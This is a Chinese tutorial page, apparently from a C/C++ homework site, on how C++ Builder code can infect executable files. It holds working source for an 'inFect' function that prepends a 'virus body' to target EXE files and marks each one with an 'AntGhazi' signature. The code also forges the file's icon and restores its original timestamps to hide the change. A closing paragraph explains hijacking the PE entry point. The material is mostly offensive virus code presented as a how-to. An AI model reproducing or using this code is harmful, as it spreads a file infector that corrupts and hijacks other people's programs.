关于BCB写入文件举办传染的问题
当前位置:以往代写 > C/C++ 教程 >关于BCB写入文件举办传染的问题

关于BCB写入文件举办传染的问题

2019-06-13

关于BCB写入文件举办传染的问题

关于BCB写入文件举办传染的问题

提示一点,一种最简朴的要领是,本身做一个外壳措施(Shell),然后将要运行的措施以某种方法放入到外壳措施中(好比以资源可能特定位置数据),而外壳措施可以抽取原可执行措施文件得图标,并可修改本身的图标与之沟通。这样一来,颠末修改的措施就是 外壳措施 + 原可执行措施(已作为数据存在于外壳措施中),运行后自然先启动外壳措施,你可以在个中插手一些权限鉴定的代码,通过验证后,外壳措施将自身中的真正可执行文件数据提取并运行。这内里的要求是,外壳措施必需用纯 WinAPI SDK 方法编写,以淘汰文件体积;外壳措施该当对写入自身的原可执行措施数据作加密处理惩罚,以防被窃取。你可以位外壳措施增加传染成果(不要做病毒哦……)等等。

/****************************************************************************
Function Name : inFect
Function : 传染文件
Parement : char *strFile 文件名
char *strSource 病毒体
DWORD dwSourceSize 病毒体长度
Return : if success return 1,else return 0;
*****************************************************************************/
int inFect(WIN32_FIND_DATA _lpFindFileData,char *strSource,DWORD dwSourceSize){
HANDLE hSearchFile=NULL;
DWORD dwSearchFileSize=0;
char VirusFlag[10]={'\0'};
DWORD bytes_write;
WIN32_FIND_DATA lpFindFileData=_lpFindFileData;
char *strFile=lpFindFileData.cFileName ;
//char *strFile="AntGhazi.tmp\0";//测试时,特定只传染此文件
//strFile="e:\\kkkk\\a.exe";//c:\\AntGhazi.tmp\0";//测试时,特定只传染此文件
::SetFileAttributes (strFile,FILE_ATTRIBUTE_NORMAL);
hSearchFile=::CreateFile (strFile,GENERIC_READ|GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
if(hSearchFile == INVALID_HANDLE_VALUE){
::CloseHandle (hSearchFile);
::SetFileAttributes (strFile,lpFindFileData.dwFileAttributes );
return 0;
}
::SetFilePointer (hSearchFile,80, NULL, FILE_BEGIN); //先读取符号
::ReadFile (hSearchFile,VirusFlag,8,&bytes_write,0);
::ReadFile (hSearchFile,&dwSearchFileSize,4,&bytes_write,0);
if(strcmp(VirusFlag,"AntGhazi")!=0){ //传染
//先读取长度
dwSearchFileSize=::GetFileSize (hSearchFile,NULL); //原长度
if(dwSearchFileSize>10485760){ //假如文件大于10M,则退出
::CloseHandle (hSearchFile);
::SetFileAttributes (strFile,lpFindFileData.dwFileAttributes );
return 0;
}
char *pSearchFile=new char[dwSearchFileSize];
::SetFilePointer (hSearchFile,0,NULL,FILE_BEGIN); //读取原文件内容
::ReadFile (hSearchFile,pSearchFile,dwSearchFileSize,&bytes_write,0);
memmove(strSource+80,"AntGhazi",8); //写入符号
memcpy(strSource+88,&dwSearchFileSize,4); //写入源长度
::SetFilePointer(hSearchFile,0,NULL,FILE_BEGIN); //筹备写入文件中
ModifyIcon(&strSource,pSearchFile); //修改ICON
::WriteFile (hSearchFile,strSource,dwSourceSize,&bytes_write,0);
::WriteFile (hSearchFile,pSearchFile,dwSearchFileSize,&bytes_write,0);
delete pSearchFile;
SetFileTime(hSearchFile,&lpFindFileData.ftCreationTime,&lpFindFileData.ftLastAccessTime ,&lpFindFileData.ftLastWriteTime);//写入日期
::CloseHandle (hSearchFile);
}else{
::CloseHandle (hSearchFile);
}
::SetFileAttributes (strFile,lpFindFileData.dwFileAttributes );
return 1;
}

先弄大白EXE文件的名目,每个EXE文件都有一个文件头叫PE,那文件头内里界说了该EXE文件内里各段的地点等许多重要的数据,有一个起始的指针指向措施开始运行的进口地点,你做个外壳把那地点改成你的措施进口,然后在你措施竣事的时候转到本来的谁人进口就可以了。

说起原理来容易,但想弄大白PE可真不是件容易事哦!

    关键字:

在线提交作业